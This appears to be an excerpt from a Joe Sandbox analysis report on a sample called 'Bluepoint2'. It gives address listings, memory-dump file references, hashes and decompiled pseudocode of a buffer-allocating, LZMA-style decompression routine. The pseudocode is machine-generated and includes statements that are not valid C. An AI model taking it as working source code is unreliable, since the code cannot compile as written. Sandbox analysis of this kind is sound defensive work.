                                                                                                                                    0x00406fea
                                                                                                                                    0x00406fc2
                                                                                                                                    0x00406fc2
                                                                                                                                    0x00406fca
                                                                                                                                    0x00406fcf
                                                                                                                                    0x00406fd1
                                                                                                                                    0x00406fd3
                                                                                                                                    0x00406fd3
                                                                                                                                    0x00406fed
                                                                                                                                    0x00406ff4
                                                                                                                                    0x00406ff7
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ff9
                                                                                                                                    0x00406ff9
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ff9
                                                                                                                                    0x00000000
                                                                                                                                    0x00407286
                                                                                                                                    0x00407286
                                                                                                                                    0x0040728a
                                                                                                                                    0x004075b1
                                                                                                                                    0x004075b1
                                                                                                                                    0x00000000
                                                                                                                                    0x004075b1
                                                                                                                                    0x00407290
                                                                                                                                    0x00407290
                                                                                                                                    0x00407293
                                                                                                                                    0x00407296
                                                                                                                                    0x0040729a
                                                                                                                                    0x0040729d
                                                                                                                                    0x004072a3
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407056
                                                                                                                                    0x00407056
                                                                                                                                    0x00407059
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407395
                                                                                                                                    0x00407395
                                                                                                                                    0x00407399
                                                                                                                                    0x004073bb
                                                                                                                                    0x004073bb
                                                                                                                                    0x004073be
                                                                                                                                    0x004073c8
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x00000000
                                                                                                                                    0x004073cb
                                                                                                                                    0x0040739b
                                                                                                                                    0x0040739b
                                                                                                                                    0x0040739e
                                                                                                                                    0x004073a2
                                                                                                                                    0x004073a5
                                                                                                                                    0x004073a5
                                                                                                                                    0x004073a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407452
                                                                                                                                    0x00407452
                                                                                                                                    0x00407456
                                                                                                                                    0x00407474
                                                                                                                                    0x00407474
                                                                                                                                    0x00407474
                                                                                                                                    0x00407474
                                                                                                                                    0x0040747b
                                                                                                                                    0x00407482
                                                                                                                                    0x00407489
                                                                                                                                    0x00407489
                                                                                                                                    0x00407490
                                                                                                                                    0x00407493
                                                                                                                                    0x0040749a
                                                                                                                                    0x00000000
                                                                                                                                    0x0040749d
                                                                                                                                    0x00407458
                                                                                                                                    0x00407458
                                                                                                                                    0x0040745b
                                                                                                                                    0x0040745e
                                                                                                                                    0x00407461
                                                                                                                                    0x00407468
                                                                                                                                    0x004073ac
                                                                                                                                    0x004073ac
                                                                                                                                    0x004073af
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407543
                                                                                                                                    0x00407543
                                                                                                                                    0x00407546
                                                                                                                                    0x00407447
                                                                                                                                    0x00407447
                                                                                                                                    0x00407447
                                                                                                                                    0x00000000
                                                                                                                                    0x0040744d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040717d
                                                                                                                                    0x0040717d
                                                                                                                                    0x0040717f
                                                                                                                                    0x00407186
                                                                                                                                    0x00407187
                                                                                                                                    0x00407189
                                                                                                                                    0x0040718c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407490
                                                                                                                                    0x00407490
                                                                                                                                    0x00407493
                                                                                                                                    0x0040749a
                                                                                                                                    0x00000000
                                                                                                                                    0x0040749d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004071c2
                                                                                                                                    0x004071c2
                                                                                                                                    0x004071c5
                                                                                                                                    0x004071fb
                                                                                                                                    0x004071fb
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732e
                                                                                                                                    0x0040732e
                                                                                                                                    0x00407331
                                                                                                                                    0x00407333
                                                                                                                                    0x004075bd
                                                                                                                                    0x004075bd
                                                                                                                                    0x00000000
                                                                                                                                    0x004075bd
                                                                                                                                    0x00407339
                                                                                                                                    0x00407339
                                                                                                                                    0x0040733c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407342
                                                                                                                                    0x00407342
                                                                                                                                    0x00407346
                                                                                                                                    0x00407349
                                                                                                                                    0x00407349
                                                                                                                                    0x00407349
                                                                                                                                    0x00000000
                                                                                                                                    0x00407349
                                                                                                                                    0x004071c7
                                                                                                                                    0x004071c7
                                                                                                                                    0x004071c9
                                                                                                                                    0x004071cb
                                                                                                                                    0x004071cd
                                                                                                                                    0x004071d0
                                                                                                                                    0x004071d1
                                                                                                                                    0x004071d3
                                                                                                                                    0x004071d5
                                                                                                                                    0x004071d8
                                                                                                                                    0x004071db
                                                                                                                                    0x004071f1
                                                                                                                                    0x004071f1
                                                                                                                                    0x004071f6
                                                                                                                                    0x0040722e
                                                                                                                                    0x0040722e
                                                                                                                                    0x00407232
                                                                                                                                    0x0040725b
                                                                                                                                    0x0040725e
                                                                                                                                    0x00407260
                                                                                                                                    0x00407267
                                                                                                                                    0x0040726a
                                                                                                                                    0x0040726d
                                                                                                                                    0x0040726d
                                                                                                                                    0x00407272
                                                                                                                                    0x00407272
                                                                                                                                    0x00407274
                                                                                                                                    0x00407277
                                                                                                                                    0x0040727e
                                                                                                                                    0x00407281
                                                                                                                                    0x004072ae
                                                                                                                                    0x004072ae
                                                                                                                                    0x004072b1
                                                                                                                                    0x004072b4
                                                                                                                                    0x00407328
                                                                                                                                    0x00407328
                                                                                                                                    0x00407328
                                                                                                                                    0x00407328
                                                                                                                                    0x00000000
                                                                                                                                    0x00407328
                                                                                                                                    0x004072b6
                                                                                                                                    0x004072b6
                                                                                                                                    0x004072bc
                                                                                                                                    0x004072bf
                                                                                                                                    0x004072c2
                                                                                                                                    0x004072c5
                                                                                                                                    0x004072c8
                                                                                                                                    0x004072cb
                                                                                                                                    0x004072ce
                                                                                                                                    0x004072d1
                                                                                                                                    0x004072d4
                                                                                                                                    0x004072d7
                                                                                                                                    0x004072f0
                                                                                                                                    0x004072f2
                                                                                                                                    0x004072f5
                                                                                                                                    0x004072f6
                                                                                                                                    0x004072f9
                                                                                                                                    0x004072fb
                                                                                                                                    0x004072fe
                                                                                                                                    0x00407300
                                                                                                                                    0x00407302
                                                                                                                                    0x00407305
                                                                                                                                    0x00407307
                                                                                                                                    0x0040730a
                                                                                                                                    0x0040730e
                                                                                                                                    0x00407310
                                                                                                                                    0x00407310
                                                                                                                                    0x00407311
                                                                                                                                    0x00407314
                                                                                                                                    0x00407317
                                                                                                                                    0x004072d9
                                                                                                                                    0x004072d9
                                                                                                                                    0x004072e1
                                                                                                                                    0x004072e6
                                                                                                                                    0x004072e8
                                                                                                                                    0x004072eb
                                                                                                                                    0x004072eb
                                                                                                                                    0x0040731a
                                                                                                                                    0x00407321
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x00000000
                                                                                                                                    0x00407323
                                                                                                                                    0x00407323
                                                                                                                                    0x00000000
                                                                                                                                    0x00407323
                                                                                                                                    0x00407321
                                                                                                                                    0x00407234
                                                                                                                                    0x00407234
                                                                                                                                    0x00407237
                                                                                                                                    0x00407239
                                                                                                                                    0x0040723c
                                                                                                                                    0x0040723f
                                                                                                                                    0x00407242
                                                                                                                                    0x00407244
                                                                                                                                    0x00407247
                                                                                                                                    0x0040724a
                                                                                                                                    0x0040724a
                                                                                                                                    0x0040724d
                                                                                                                                    0x0040724d
                                                                                                                                    0x00407250
                                                                                                                                    0x00407257
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x00000000
                                                                                                                                    0x00407259
                                                                                                                                    0x00407259
                                                                                                                                    0x00000000
                                                                                                                                    0x00407259
                                                                                                                                    0x00407257
                                                                                                                                    0x004071dd
                                                                                                                                    0x004071dd
                                                                                                                                    0x004071e0
                                                                                                                                    0x004071e2
                                                                                                                                    0x004071e5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f44
                                                                                                                                    0x00406f44
                                                                                                                                    0x00406f48
                                                                                                                                    0x0040758d
                                                                                                                                    0x0040758d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040758d
                                                                                                                                    0x00406f4e
                                                                                                                                    0x00406f4e
                                                                                                                                    0x00406f51
                                                                                                                                    0x00406f54
                                                                                                                                    0x00406f57
                                                                                                                                    0x00406f5a
                                                                                                                                    0x00406f5d
                                                                                                                                    0x00406f60
                                                                                                                                    0x00406f62
                                                                                                                                    0x00406f65
                                                                                                                                    0x00406f68
                                                                                                                                    0x00406f6b
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004070cf
                                                                                                                                    0x004070cf
                                                                                                                                    0x004070d3
                                                                                                                                    0x00407599
                                                                                                                                    0x00407599
                                                                                                                                    0x00000000
                                                                                                                                    0x00407599
                                                                                                                                    0x004070d9
                                                                                                                                    0x004070d9
                                                                                                                                    0x004070dc
                                                                                                                                    0x004070df
                                                                                                                                    0x004070e2
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e7
                                                                                                                                    0x004070ea
                                                                                                                                    0x004070ed
                                                                                                                                    0x004070f0
                                                                                                                                    0x004070f3
                                                                                                                                    0x004070f6
                                                                                                                                    0x004070f7
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070fc
                                                                                                                                    0x004070ff
                                                                                                                                    0x00407102
                                                                                                                                    0x00407105
                                                                                                                                    0x00407105
                                                                                                                                    0x00407105
                                                                                                                                    0x00407108
                                                                                                                                    0x0040710a
                                                                                                                                    0x0040710a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040734c
                                                                                                                                    0x0040734c
                                                                                                                                    0x0040734c
                                                                                                                                    0x00407350
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407356
                                                                                                                                    0x00407356
                                                                                                                                    0x00407359
                                                                                                                                    0x0040735c
                                                                                                                                    0x0040735f
                                                                                                                                    0x00407361
                                                                                                                                    0x00407361
                                                                                                                                    0x00407361
                                                                                                                                    0x00407364
                                                                                                                                    0x00407367
                                                                                                                                    0x0040736a
                                                                                                                                    0x0040736d
                                                                                                                                    0x00407370
                                                                                                                                    0x00407373
                                                                                                                                    0x00407374
                                                                                                                                    0x00407376
                                                                                                                                    0x00407376
                                                                                                                                    0x00407376
                                                                                                                                    0x00407379
                                                                                                                                    0x0040737c
                                                                                                                                    0x0040737f
                                                                                                                                    0x00407382
                                                                                                                                    0x00407385
                                                                                                                                    0x00407389
                                                                                                                                    0x0040738b
                                                                                                                                    0x0040738e
                                                                                                                                    0x00000000
                                                                                                                                    0x00407390
                                                                                                                                    0x00407390
                                                                                                                                    0x0040710d
                                                                                                                                    0x0040710d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040710d
                                                                                                                                    0x0040738e
                                                                                                                                    0x004075c3
                                                                                                                                    0x004075c3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406bf2
                                                                                                                                    0x004075fa
                                                                                                                                    0x004075fa
                                                                                                                                    0x00000000
                                                                                                                                    0x004075fa
                                                                                                                                    0x00407447
                                                                                                                                    0x004074c7
                                                                                                                                    0x00407490

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                                                                    • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                                                                                    • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                                                                    • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
